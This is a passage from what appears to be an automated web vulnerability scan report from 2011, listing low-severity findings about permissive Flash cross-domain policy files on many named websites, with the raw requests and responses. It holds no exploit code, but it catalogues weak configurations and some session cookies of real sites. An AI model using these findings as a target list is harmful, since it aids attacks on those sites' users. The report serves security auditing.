SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.myweather.com" />
</cro
...[SNIP]...

7.288. http://www.netvibesbusiness.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.netvibesbusiness.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.netvibesbusiness.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 04 May 2011 02:41:17 GMT
Content-Type: text/xml
Connection: close
X-Men: 13
Accept-Ranges: bytes
Last-Modified: Wed, 27 May 2009 07:33:04 GMT
Content-Length: 211
X-slb: 5
X-Jobs: http://about.netvibes.com/jobs.php looking for a sysadmin :)

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.meebo.com" />
</cross-dom
...[SNIP]...

7.289. http://www.newschief.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.newschief.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.newschief.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 26 Oct 2010 18:49:45 GMT
Content-Length: 1302
Accept-Ranges: bytes
ETag: "d18ae58e3e75cb1:0"
Server: Microsoft-IIS/7.0
Date: Wed, 04 May 2011 01:22:46 GMT
Age: 54
X-Cache: HIT from nysquid01
X-Cache-Lookup: HIT from nysquid01:80
Via: 1.0 nysquid01 (squid/3.0.STABLE18)
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.starnewsonline.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.gainesville.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.gainesvillesun.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sunone.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ocala.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.starbanner.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.publicus.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.us.publicus.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ny.publicus.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.pressdemocrat.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" secure="false" />
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.northfloridainteractive.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" secure="false" />
...[SNIP]...
<allow-access-from domain="studio3.brightcove.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ap.org" secure="false" />
...[SNIP]...

7.290. http://www.ningin.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ningin.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ningin.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:08:27 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.14 with Suhosin-Patch
Last-Modified: Fri, 16 Apr 2010 10:01:50 GMT
ETag: "6d4a22-20d-48457b32dff80"
Accept-Ranges: bytes
Content-Length: 525
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.mixrmedia.com" />
<allow-access-from domain="static.mixrmedia.com" />
<allow-access-from domain="*.ningin.com" />
<allow-access-from domain="*.wirebot.com" />
<allow-access-from domain="www.mochiads.com" />
<allow-access-from domain="www.mochimedia.com" />
<allow-access-from domain="x.mochiads.com" />
...[SNIP]...

7.291. http://www.onet.tv/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.onet.tv
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.onet.tv

Response

HTTP/1.0 200 OK
Cache-Control: private
Server: AOLserver/3.4.2 SP/1
Expires: Mon, 03 May 2010 20:40:12 GMT
P3P: CP="ALL DSP COR IVD IVA PSD PSA TEL TAI CUS ADM CUR CON SAM OUR IND"
Vary: Accept-Encoding
Last-Modified: Tue, 08 Feb 2011 11:12:36 GMT
Date: Tue, 03 May 2011 20:31:28 GMT
Content-Type: text/xml
Content-Length: 278
X-Cache: HIT from sq1.m3r2.onet
X-Cache-Lookup: HIT from sq1.m3r2.onet:80
Via: 1.0 sq1.m3r2.onet:80 (squid)
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.onet" />
   <allow-access-from domain="*.onet.pl" />
   <allow-access-from domain="*.onet.tv" />
   <allow-access-from domain="onet.pl" />
   <allow-access-from domain="onet.tv" />
...[SNIP]...

7.292. http://www.pixazza.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pixazza.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pixazza.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:57:55 GMT
Server: Apache
Last-Modified: Wed, 13 Apr 2011 05:36:51 GMT
Accept-Ranges: bytes
Content-Length: 213
Content-Type: application/xml
X-Cache: MISS from lb2-sv.int.pixazza.com
X-Cache-Lookup: MISS from lb2-sv.int.pixazza.com:80
Via: 1.0 lb2-sv.int.pixazza.com:80 (squid/2.6.STABLE18)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.pixazza.com" />
</cross-do
...[SNIP]...

7.293. http://www.pizap.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pizap.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pizap.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:33:46 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 07 Oct 2010 18:27:46 GMT
ETag: "2defb-11a-ced0c80"
Accept-Ranges: bytes
Content-Length: 282
Vary: Accept-Encoding
Content-Type: text/xml
Cache-control: private
Set-Cookie: SERVERID=i-020bf36f; path=/
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.amazonaws.com" />
<allow-access-from domain="*.cloudfront.net" />
...[SNIP]...

7.294. http://www.playtech.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.playtech.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.playtech.com

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 20 Aug 2008 08:06:51 GMT
ETag: "7431-6cb-454dfafd11cc0"
Accept-Ranges: bytes
Content-Length: 1739
Connection: close
Content-Type: application/xml
Vary: Accept-Encoding

<?xml version="1.0"?>
<!-- http://www.foo.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="www.stanleyslots.com" />
<allow-access-from domain="www.stanleyslots.co.uk" />
<allow-access-from domain="www.stanleysslots.com" />
<allow-access-from domain="www.stanleysslots.co.uk" />
<allow-access-from domain="www.acropolisslots.com" />
<allow-access-from domain="www.acropolisslots.co.uk" />
<allow-access-from domain="www.acropolislots.com" />
<allow-access-from domain="www.acropolislots.co.uk" />
<allow-access-from domain="www.acropolis-slots.com" />
<allow-access-from domain="www.acropolis-slots.co.uk" />
<allow-access-from domain="www.stanleys-slots.com" />
<allow-access-from domain="www.stanleys-slots.co.uk" />
<allow-access-from domain="www.stanley-slots.com" />
<allow-access-from domain="www.stanley-slots.co.uk" />
<allow-access-from domain="www.slotsclub.co.uk" />
<allow-access-from domain="www.clubslots.co.uk" />
<allow-access-from domain="www.skypalmscasino.com" />
<allow-access-from domain="www.skybreezescasino.com" />
<allow-access-from domain="www.skyjackpot.com" />
<allow-access-from domain="www.skykingscasino.com" />
<allow-access-from domain="www.casinocity.com" />
<allow-access-from domain="online.casinocity.com" />
<allow-access-from domain="ads.casinocity.com" />
<allow-access-from domain="as1.casinocity.com" />
<allow-access-from domain="*.centrebet.com" />
<allow-access-from domain="*.centrebet.co.uk" />
<allow-access-from domain="*.iberapuesta.com" />
<allow-access-from domain="*.videobet.com" />    
<allow-access-from domain="*.winajackpot.com" />
<allow-access-from domain="*.playtech.ph" />
...[SNIP]...

7.295. http://www.quickandsimple.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.quickandsimple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.quickandsimple.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 2016
Content-Type: application/xml
Cache-Control: max-age=559
Date: Wed, 04 May 2011 02:19:03 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.syrupnyc.org"/>
   <allow-access-from domain="*.esquire.com"/>
   <allow-access-from domain="*.cosmogirl.com"/>
   <allow-access-from domain="*.cosmopolitan.com"/>
   <allow-access-from domain="*.countryliving.com"/>
   <allow-access-from domain="*.goodhousekeeping.com"/>
   <allow-access-from domain="*.harpersbazaar.com"/>
   <allow-access-from domain="*.housebeautiful.com"/>
   <allow-access-from domain="*.marieclaire.com"/>
   <allow-access-from domain="*.misquincemag.com"/>
   <allow-access-from domain="*.popularmechanics.com"/>
   <allow-access-from domain="*.quickandsimple.com"/>
   <allow-access-from domain="*.redbookmag.com"/>
   <allow-access-from domain="*.seventeen.com"/>
   <allow-access-from domain="*.teenmag.com"/>
   <allow-access-from domain="*.thedailygreen.com"/>
   <allow-access-from domain="*.veranda.com"/>
   <allow-access-from domain="*.townandcountrymag.com"/>
   <allow-access-from domain="*.townandcountrytravelmag.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.hearstmags.com"/>
   <allow-access-from domain="*.realage.com"/>
   <allow-access-from domain="*.realbeauty.com"/>
<allow-access-from domain="*.mstudio.com"/>
   <allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.thesurvivorsclub.org" secure="false" />
...[SNIP]...
<allow-access-from domain="*.googlesyndication.com" />
   <allow-access-from domain="*.doubleclick.net"/>
   <allow-access-from domain="*.harpersbazaar.co.uk"/>
   <allow-access-from domain="*.company.co.uk"/>
   <allow-access-from domain="*.youandyourwedding.co.uk"/>
   <allow-access-from domain="*.menshealth.co.uk"/>
   <allow-access-from domain="*.babyexpert.com"/>
   <allow-access-from domain="*.handbag.com"/>
   <allow-access-from domain="*.cosmopolitan.co.uk"/>
...[SNIP]...

7.296. http://www.redrocklasvegas.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.redrocklasvegas.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.redrocklasvegas.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:59:03 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Content-Length: 569
Cache-Control: max-age=315360000
Expires: Sat, 01 May 2021 01:59:03 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.atdmt.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/>
...[SNIP]...

7.297. http://www.reflector.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.reflector.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.reflector.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 03:29:09 GMT
Content-Type: application/rss+xml; charset=utf-8
Connection: close
Content-Length: 353
Last-Modified: Wed, 04 May 2011 03:23:46 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Accept-Ranges: bytes
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.reflector.com" />
<allow-access-from domain="*.www.reflector.com" />
...[SNIP]...

7.298. http://www.rtl.de/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.rtl.de
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.rtl.de

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:38:01 GMT
Server: Apache
Last-Modified: Thu, 14 Apr 2011 15:35:01 GMT
ETag: "18b04597-5ab-4a0e2ab219340"
Accept-Ranges: bytes
Content-Length: 1451
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rtl.de"/>
<allow-access-from domain="*.vox.de"/>
<allow-access-from domain="*.rtlnm.de"/>
<allow-access-from domain="*.passion-tv.de"/>
<allow-access-from domain="*.passion.de"/>
<allow-access-from domain="*.clipfish.de"/>
<allow-access-from domain="img2.bullex.de" comment="dsds sonyericsson"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.2mdn.net"/>
<allow-access-from domain="*.kochbar.de"/>
<allow-access-from domain="*.frauenzimmer.de"/>
<allow-access-from domain="*.supertalent.de"/>
<allow-access-from domain="*.gzsz.de"/>
<allow-access-from domain="*.voxnow.de"/>
       <allow-access-from domain="*.vox-now.de"/>
       <allow-access-from domain="*.rtlnow.de"/>
       <allow-access-from domain="*.rtl-now.de"/>
       <allow-access-from domain="*.superrtlnow.de"/>
       <allow-access-from domain="*.superrtl-now.de"/>
<allow-access-from domain="*.rtlregional.de"/>
<allow-access-from domain="*.rtl-regional.de"/>
<allow-access-from domain="*.n-tv.de"/>
<allow-access-from domain="*.static-fra.de"/>
<allow-access-from domain="*.vip.de" />
...[SNIP]...

7.299. http://www.scarletknights.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scarletknights.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.scarletknights.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 07 Dec 2010 18:46:11 GMT
Accept-Ranges: bytes
ETag: "b7e7e343f96cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:43:14 GMT
Connection: close
Content-Length: 478

<?xml version="1.0" encoding="utf-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="scarletknights.com" />
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.google-analytics.com"/>
<allow-access-from domain="165.230.39.12" />
...[SNIP]...

7.300. http://www.scrapblog.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scrapblog.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.scrapblog.com

Response

HTTP/1.1 200 OK
Content-Length: 298
Content-Type: text/xml
Content-Location: http://www.scrapblog.com/crossdomain.xml
Last-Modified: Wed, 02 Dec 2009 17:20:03 GMT
Accept-Ranges: bytes
ETag: "5a304faf7373ca1:2994"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:19:51 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.scrapblog.com" secure="false" />
...[SNIP]...

7.301. http://www.sixt.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sixt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sixt.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 11 Dec 2009 10:00:20 GMT
ETag: "d72c31-125-47a70fdcf7500"
Accept-Ranges: bytes
Content-Length: 293
Content-Type: application/xml
P3P: policyref='http://www.sixt.com/w3c/p3p.xml',CP='NON DSP COR CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR COM NAV DEM'
Date: Wed, 04 May 2011 04:16:57 GMT
Connection: close
Set-Cookie: ServerID=1172; path=/

<cross-domain-policy>
<allow-access-from domain="www.devmonkey.se" />
<allow-access-from domain="*.sas.se" />
<allow-access-from domain="*.flysas.com" />
<allow-access-from domain="*.sas.dk" />
<allow-access-from domain="*.sas.no" />
...[SNIP]...

7.302. http://www.sleepconnect.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sleepconnect.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sleepconnect.com

Response

HTTP/1.1 200 OK
Content-Type: application/xml; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
ETag: "cf64b7c08eb1e296a9b04bc83d270c86"
X-Runtime: 5
Content-Length: 348
Set-Cookie: _tk=BAh7AA%3D%3D--e95288a5adac97260428dac777177ecbcfcb06dc; domain=.sleepconnect.com; path=/; expires=Fri, 03-Jun-2011 03:25:40 GMT
Set-Cookie: _alliance_health_session=BAh7BzoOd29ya2Zsb3dzewA6D3Nlc3Npb25faWQiJWU2YTU0MTYwOTBjZTczZTc2ZWMxMmFiNTBlOGIzMmZm--f2b8f481cc3cff138de42701ae225bb9f810ea15; domain=.sleepconnect.com; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate
Server: nginx/0.8.54 + Phusion Passenger 3.0.6 (mod_rails/mod_rack)

<?xml version='1.0' encoding='utf-8' ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain='*.www.sleepconnect.com'>
...[SNIP]...

7.303. http://www.sportrider.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sportrider.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sportrider.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 02:20:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bzoc4ijswtkhnvr223yer4ar; path=/; HttpOnly
Set-Cookie: UserPuid=2342897012917217786; domain=sportrider.com; expires=Wed, 04-May-2061 02:20:15 GMT; path=/
Cache-Control: private
Content-Type: text/xml
Content-Length: 3634

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.4wdandsportutility.com" />
<allow-access-from domain="*.4wheeloffroad.com" />
<allow-access-from domain="*.4wdandsportutility.com" />
<allow-access-from domain="*.atvrideronline.com" />
<allow-access-from domain="*.autobuyguide.com" />
<allow-access-from domain="*.automobilemag.com" />
<allow-access-from domain="*.automotive.com" />
<allow-access-from domain="*.camaroperformers.com" />
<allow-access-from domain="*.caraudiomag.com" />
<allow-access-from domain="*.carcraft.com" />
<allow-access-from domain="*.chevyhiperformance.com" />
<allow-access-from domain="*.circletrack.com" />
<allow-access-from domain="*.classictrucks.com" />
<allow-access-from domain="*.corvettefever.com" />
<allow-access-from domain="*.customclassictrucks.com" />
<allow-access-from domain="*.customrodder.com" />
<allow-access-from domain="*.dieselpowermag.com" />
<allow-access-from domain="*.dirtrider.com" />
<allow-access-from domain="*.europeancarweb.com" />
<allow-access-from domain="*.eurotuner.com" />
<allow-access-from domain="*.fourwheeler.com" />
<allow-access-from domain="*.gmhightechperformance.com" />
<allow-access-from domain="*.highperformancepontiac.com" />
<allow-access-from domain="*.hondatuningmagazine.com" />
<allow-access-from domain="*.hotbikeweb.com" />
<allow-access-from domain="*.hotrod.com" />
<allow-access-from domain="*.hotrodsbikeworks.com" />
<allow-access-from domain="*.importtuner.com" />
<allow-access-from domain="*.intellichoice.com" />
<allow-access-from domain="*.internetautoguide.com" />
<allow-access-from domain="*.jpmagazine.com" />
<allow-access-from domain="*.kitcarmag.com" />
<allow-access-from domain="*.lowridermagazine.com" />
<allow-access-from domain="*.minitruckinweb.com" />
<allow-access-from domain="*.modified.com" />
<allow-access-from domain="*.modifiedmustangs.com" />
<allow-access-from domain="*.moparmusclemagazine.com" />
<allow-access-from domain="*.motorcyclecruiser.com" />
<allow-access-from domain="*.motorcyclistonline.com" />
<allow-access-from domain="*.motortrend.com" />
<allow-access-from domain="*.motortrendenespanol.com" />
<allow-access-from domain="*.musclemustangfastfords.com" />
<allow-access-from domain="*.mustang50magazine.com" />
<allow-access-from domain="*.mustangandfords.com" />
<allow-access-from domain="*.mustangmonthly.com" />
<allow-access-from domain="*.newcar.com" />
<allow-access-from domain="*.off-roadweb.com" />
<allow-access-from domain="*.popularhotrodding.com" />
<allow-access-from domain="*.rodandcustommagazine.com" />
<allow-access-from domain="*.sportcompactcarweb.com" />
<allow-access-from domain="*.sportrider.com" />
<allow-access-from domain="*.sporttruck.com" />
<allow-access-from domain="*.stockcarracing.com" />
<allow-access-from domain="*.streetchopperweb.com" />
<allow-access-from domain="*.superchevy.com" />
<allow-access-from domain="*.superstreetbike.com" />
<allow-access-from domain="*.superstreetonline.com" />
<allow-access-from domain="*.truckinssuv.com" />
<allow-access-from domain="*.truckinweb.com" />
<allow-access-from domain="*.trucktrend.com" />
<allow-access-from domain="*.turbomag.com" />
<allow-access-from domain="*.turbomagazine.com" />
<allow-access-from domain="*.vetteweb.com" />
<allow-access-from domain="*.vwtrendsweb.com" />
...[SNIP]...

7.304. http://www.streetrodderweb.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.streetrodderweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.streetrodderweb.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 01:21:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bcxxs12x2ajjzb2j3ccyhe45; path=/; HttpOnly
Set-Cookie: UserPuid=2337470191544588321; domain=streetrodderweb.com; expires=Wed, 04-May-2061 01:21:45 GMT; path=/
Cache-Control: private
Content-Type: text/xml
Content-Length: 3634

<?xml version="1.0" ?>
<cross-domain-policy>
